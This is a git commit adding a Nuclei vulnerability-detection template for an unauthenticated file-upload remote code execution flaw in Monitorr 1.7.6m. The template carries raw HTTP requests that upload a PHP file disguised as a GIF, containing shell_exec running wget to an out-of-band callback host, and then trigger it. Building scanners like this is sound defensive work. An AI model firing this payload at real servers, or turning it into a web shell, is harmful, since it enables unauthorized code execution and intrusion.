Create monitorr-rce.yaml

This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr. Signed-off-by: GwanYeong Kim <gy741.kim@gmail.com>
2021-07-20 08:20:18 +09:00 · 2021-07-20 08:20:18 +09:00 · b32ccad2c8
parent c999ea6f62
commit b32ccad2c8
1 changed files with 51 additions and 0 deletions
--- a/vulnerabilities/other/monitorr-rce.yaml
+++ b/vulnerabilities/other/monitorr-rce.yaml
@ -0,0 +1,51 @@
 id: monitorr-rce
 info:
  name: Monitorr 1.7.6m - Unauthenticated Remote Code Execution
  author: gy741
  severity: critical
  description: This template detects an Monitorr 1.7.6m a remote code execution vulnerability. Improper input validation and lack of authorization leading to arbitrary file upload in web application. An unauthorized attacker with web access to could upload and execute a specially crafted file leading to remote code execution within the Monitorr.
  reference: |
    - https://lyhinslab.org/index.php/2020/09/12/how-the-white-box-hacking-works-authorization-bypass-and-remote-code-execution-in-monitorr-1-7-6/
    - https://www.exploit-db.com/exploits/48980
  tags: monitorr,rce,oob
 requests:
  - raw:
      - |
        POST /assets/php/upload.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
        Accept-Encoding: gzip, deflate
        Accept: text/plain, */*; q=0.01
        Connection: close
        Accept-Language: en-US,en;q=0.5
        X-Requested-With: XMLHttpRequest
        Content-Type: multipart/form-data; boundary=---------------------------31046105003900160576454225745
        Origin: http://{{Hostname}}
        Referer: http://{{Hostname}}
        Content-Length: 319
        -----------------------------31046105003900160576454225745
        Content-Disposition: form-data; name="fileToUpload"; filename="nuclei_poc.php"
        Content-Type: image/gif
        GIF89a213213123<?php shell_exec("wget -c http://{{interactsh-url}}");
        -----------------------------31046105003900160576454225745--
      - |
        GET /assets/data/usrimg/nuclei_poc.php HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:82.0) Gecko/20100101 Firefox/82.0
        Accept-Encoding: gzip, deflate
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Connection: close
        Accept-Language: en-US,en;q=0.5
        Upgrade-Insecure-Requests: 1
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"